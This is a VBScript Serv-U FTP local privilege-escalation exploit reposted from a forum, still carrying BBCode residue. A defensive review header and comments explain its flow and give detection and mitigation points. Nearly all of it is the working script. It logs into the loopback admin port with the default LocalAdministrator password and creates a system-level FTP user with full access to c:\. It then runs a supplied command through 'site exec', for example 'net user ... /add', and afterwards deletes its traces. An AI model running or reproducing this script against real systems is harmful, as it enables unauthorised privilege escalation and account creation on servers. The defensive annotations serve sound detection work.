VBS的serv-u提权脚本
' Review note: defensive reading of this sample. The listing is reproduced as posted;
' the [font]/[color]/[size] tags are forum paste residue, not script content.
'
' Purpose: drives a Serv-U FTP server's local administration interface over loopback so
' that the FTP service executes a command supplied on the command line.
' Flow visible in the listing:
'   1. Connect to 127.0.0.1:<servuManagePort>, log in as the local administrator account and
'      use SITE MAINTENANCE to define a domain ("hhxx", 0.0.0.0:21) and a user ("cooldiyer")
'      with Maintenance=System, home directory c:\ and access flags RWAMELCDP on c:\.
'   2. Log in to the FTP service on 127.0.0.1:21 as that user and send "site exec" followed
'      by the first script argument.
'   3. Reconnect to the administration port and delete the domain on 0.0.0.0:21 again.
' The command runs with whatever privileges the Serv-U service holds (commonly a highly
' privileged service account; confirm per host), which is what makes this a local
' privilege-escalation path.
' No server reply is ever read: every step is a send followed by a fixed 10 ms sleep, and
' "on error resume next" appears on the usage line, so the script does not verify success.
'
' Detection points grounded in this listing:
'   - a script host (wscript/cscript) creating MSWinsock.Winsock and connecting to the
'     loopback administration port (43958 here);
'   - Serv-U logs or configuration showing a short-lived domain "hhxx" or user "cooldiyer",
'     or any account with Maintenance=System created outside change control;
'   - an FTP session from 127.0.0.1 issuing SITE EXEC, and child processes of the Serv-U service;
'   - command lines terminated in LF CR order (chr(10) & chr(13)), as emitted below.
' Mitigation: do not leave the local administrator password at the widely published default
' shown below (where the installed version allows changing it), keep Serv-U on a
' vendor-supported release, run the service under a least-privileged account, and restrict
' who can run scripts on the server.
[font=宋体, Verdana, Arial, Helvetica, sans-serif][size=14px][color=#000000][color=#0000bb][/color][font=新宋体][color=#dd0000]‘usage:wscript su.vbs "net user cooldiyer 12345456 /add"on error resume next
' Configuration block. English rendering of the original inline notes, in order:
' the host's Serv-U management port / management user name / management password /
' the command to run is taken from the first argument (lower-cased by LCase).
Dim servuManagePort
Dim servuManageName
Dim servuManagePass
Dim command
servuManagePort = 43958 ‘[/color][color=#0000bb]修改为主机Serv[/color][color=#007700]-[/color][/font][font=新宋体][color=#0000bb]U的管理端口
servuManageName [/color][color=#007700]= [/color][/font][font=新宋体][color=#dd0000]"LocalAdministrator" ‘管理用户名
servuManagePass = "#l@$ak#.lk;0@P" ‘[/color][/font][font=新宋体][color=#0000bb]管理密码
command [/color][color=#007700]= [/color][color=#0000bb]LCase[/color][color=#007700]([/color][color=#0000bb]WScript[/color][color=#007700].[/color][color=#0000bb]Arguments[/color][color=#007700]([/color][color=#0000bb]0[/color][color=#007700])) ‘[/color][/font][font=新宋体][color=#0000bb]在第一个参数中设置你要运行的命令
Dim revdata
Dim sendata
' --- Phase 1: administration-port session (sock). Authenticates with the credentials above,
' --- then sends SITE MAINTENANCE with -SETDOMAIN and -SETUSERSETUP parameter lines.
' --- revdata is declared but never used; nothing is received on any socket.
Set sock=createobject("MSWinsock.Winsock")
Sock.protocol=0
Sock.connect "127.0.0.1",servuManagePort
WScript.sleep 10
Sendata="USER "&servuManageName& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="PASS "&servuManagePass& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="SITE MAINTENANCE"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-SETDOMAIN"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Domain=hhxx|0.0.0.0|21|-1|1|0 "& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-DynDNSEnable=0 "& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata=" DynIPName="& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-SETUSERSETUP"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-IP=0.0.0.0"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-PortNo=21"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-User=cooldiyer"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Password=cooldiyer"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-HomeDir=c:\"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Maintenance=System"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Ratios=None"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata=" Access=c:\|RWAMELCDP"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-GETUSERSETUP"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
sock.close
WScript.sleep 10
' --- Phase 2: FTP session (sock2) to 127.0.0.1:21 as the user defined in phase 1.
' --- The "site exec" line carries the caller-supplied command unmodified apart from LCase;
' --- a loopback FTP login followed by SITE EXEC is the key log artefact of this step.
Set sock2=createobject("MSWinsock.Winsock")
Sock2.protocol=0
Sock2.connect "127.0.0.1",21
WScript.sleep 10
Sendata="USER cooldiyer"& chr(10) &chr(13)
Sock2.senddata Sendata
WScript.sleep 10
Sendata="PASS cooldiyer"& chr(10) &chr(13)
Sock2.senddata Sendata
WScript.sleep 10
Sendata="site exec "&command&chr(10) &chr(13)
Sock2.senddata Sendata
WScript.sleep 10
Sock2.close
WScript.sleep 10
' --- Phase 3: second administration-port session (sock3). Sends -DELETEDOMAIN for
' --- 0.0.0.0:21, removing the configuration added in phase 1. Responders should therefore
' --- rely on Serv-U and process-creation logs, not on the server's current configuration.
Set sock3=createobject("MSWinsock.Winsock")
Sock3.protocol=0
Sock3.connect "127.0.0.1",servuManagePort
WScript.sleep 10
Sendata="USER "&servuManageName& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="PASS "&servuManagePass& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="SITE MAINTENANCE"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="-DELETEDOMAIN"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="-IP=0.0.0.0"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata=" PortNo=21"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="-GETDOMAIN"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sock3.close[/color] [/font][/color][/size][/font]